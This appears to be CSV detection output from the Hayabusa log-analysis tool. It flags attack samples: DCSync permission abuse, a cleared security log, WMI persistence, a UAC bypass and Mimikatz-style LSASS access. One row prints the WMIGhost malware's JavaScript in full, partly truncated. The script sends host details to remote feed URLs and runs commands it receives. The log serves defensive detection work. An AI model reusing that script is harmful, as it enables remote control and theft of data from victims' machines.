bob,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx 2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\user01\Desktop\WMIGhost.exe"" | Process: C:\Users\user01\Desktop\WMIGhost.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xaaf2b | PID: 3328 | PGUID: 365ABB72-F76A-5CA4-0000-0010FA0D1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,info,,WMI Event Consumer Activity,"Modified | Type: Script | Name: ""ProbeScriptFint"" | Dst: ""var sXmlUrl=\""http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss\"";var sOwner='XDD';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new 
$._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:function(){var e=new Enumerator($.WMI('Select * from Win32_NetworkAdapter where PNPDeviceID like \\\""%PCI%\\\"" and NetConnectionStatus=2'));if(!e.atEnd()){$.sMacAddress=e.item().MACAddress;}},GenerateUrlParam:function(){var time=new Date();$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version+'&runtime='+$.runtime;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();},CleanObjects:function(){$.oShell=null;$.oStream=null;var e=new Enumerator($.WMI('Select * from Win32_Process where Name=\\\""scrcons.exe\\\""'));while(!e.atEnd()){e.item().terminate();e.moveNext();}},Decode:function(sourceStr){var keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i@(.*)@<\\/title>+/g;var titleList=response.match(re);for(var i=0;i0){$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');if(response.length>0){var commands=null;var container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var 
i=0;i0){commandresult+=',';}commandresult+='\\''+commands[i].id+'\\':\\''+escape(result)+'\\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}else{$.sXmlUrl='';runnum=0;}}$.runtime=(new Date()).getTime()-start.getTime();WScript.Sleep(10000);}if($.sXmlUrl.length>0){return;}}}catch(e){}}},Fire:function(){$.InitObjects();try{$.MainLoop();}catch(e){}$.CleanObjects();}};new MAIN().Fire();"" | User: PC04\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Exec,Suspicious Scripting in a WMI Consumer,,../hayabusa-rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,info,,WMI Event Consumer To Filter Activity,"Modified | Consumer: ""\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\""ProbeScriptFint\"""" | Filter: ""\\\\.\\root\\subscription:__EventFilter.Name=\""ProbeScriptFint\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\scrcons.exe -Embedding | Process: C:\Windows\System32\wbem\scrcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2636 | PGUID: 365ABB72-F76F-5CA4-0000-0010AA201700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:12:00.016 
+09:00,PC04.example.corp,1,high,Persis | PrivEsc,WMI Persistence - Script Event Consumer,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-19 01:55:37.014 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\Sysmon.exe -i,../hayabusa-rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:37.014 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:37.115 +09:00,IEWIN7,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.20,../hayabusa-rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 3232 | PGUID: 365ABB72-AC09-5CB8-0000-0010999C0700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 
01:55:38.076 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 2000 | PGUID: 365ABB72-AC06-5CB8-0000-001059830700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.045 +09:00,IEWIN7,1,info,,Process Created,"Cmd: sysmon -c sysmonconfig-18-apr-2019.xml | Process: C:\Users\IEUser\Desktop\Sysmon.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.045 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.135 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\sysmonconfig-18-apr-2019.xml,../hayabusa-rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.135 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.145 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon 
Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:51.285 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,,Process Created_Sysmon 
Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: Powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3576 | PGUID: 365ABB72-AC38-5CB8-0000-0010365E0800 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0xca21 | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800 | Hash: SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:57:06.954 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,undefined | Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 912 | PGUID: 365ABB72-AB26-5CB8-0000-0010D1AE0000,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:57:52.910 +09:00,IEWIN7,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1031,technique_name=Modify Existing Service | tcp | Src: fe80:0:0:0:80ac:4126:fa58:1b81:49158 (IEWIN7) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:135 (IEWIN7) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800",../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:12.979 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:13.389 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:13.650 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:13.740 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
